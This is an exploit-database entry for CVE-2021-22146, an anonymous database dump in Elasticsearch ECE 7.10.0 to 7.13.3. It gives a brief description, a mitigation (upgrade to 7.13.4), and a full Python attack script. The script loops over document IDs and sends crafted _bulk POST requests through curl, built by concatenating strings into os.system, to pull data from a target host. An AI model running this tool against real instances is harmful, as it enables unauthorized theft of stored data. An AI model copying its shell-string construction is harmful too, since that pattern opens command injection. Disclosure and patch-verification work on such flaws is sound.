Elasticsearch ECE 7.13.3 - Anonymous Database Dump

vendor:

Elasticsearch

by:

Joan Martinez

7,5

CVSS

HIGH

Anonymous Database Dump

CWE

Product Name: Elasticsearch

Affected Version From: 7.10.0

Affected Version To: 7.13.3

Patch Exists: YES

Related CWE: CVE-2021-22146

CPE: a:elastic:elasticsearch

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Elastic ECE (Cloud)

2021

Elasticsearch ECE 7.13.3 – Anonymous Database Dump

This exploit allows an attacker to dump the entire database of an Elasticsearch instance running versions 7.10.0 to 7.13.3. The exploit works by sending a POST request to the _bulk endpoint of the Elasticsearch instance with a specially crafted payload. This payload will cause the Elasticsearch instance to return the entire database in the response.

Mitigation:

Upgrade to Elasticsearch version 7.13.4 or later.

Source

Exploit-DB raw data:

# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump
# Date: 2021-07-21
# Exploit Author: Joan Martinez @magichk
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://www.elastic.co/
# Version: >= 7.10.0 to <= 7.13.3
# Tested on: Elastic ECE (Cloud)
# CVE : CVE-2021-22146
# Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180 

import os
import argparse
import sys

######### Check Arguments
def checkArgs():
	parser = argparse.ArgumentParser()
	parser = argparse.ArgumentParser(description='Elasticdump 1.0\n')
	parser.add_argument('-s', "--host", action="store",
						dest='host',
	                    help="Host to attack.")
	parser.add_argument('-p', "--port", action="store",
						dest='port',
	                    help="Elastic search port by default 9200 or 9201")
	parser.add_argument('-i', "--index", action="store",
						dest='index',
	                    help="Index to dump (Example: 30)")


	args = parser.parse_args()
	if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) :
		parser.print_help(sys.stderr)
		sys.exit(1)
	return args

def banner():
    print("      _           _   _         _")
    print("  ___| | __ _ ___| |_(_) ___ __| |_   _ _ __ ___  _ __")
    print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ")
    print("|  __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |")
    print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/")
    print("                                                 |_|")



def exploit(host,port,index):

	if (index != 0):
	    final = int(index)
	else:
	    final = 1000000000

	cont = 0
	while (cont <= final):
		os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\"  :  {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s")
		cont = cont + 1

if __name__ == "__main__":

	banner()
	args = checkArgs()
	if (args.index):
	    exploit(args.host,args.port,args.index)
	else:
	    exploit(args.host,args.port,0)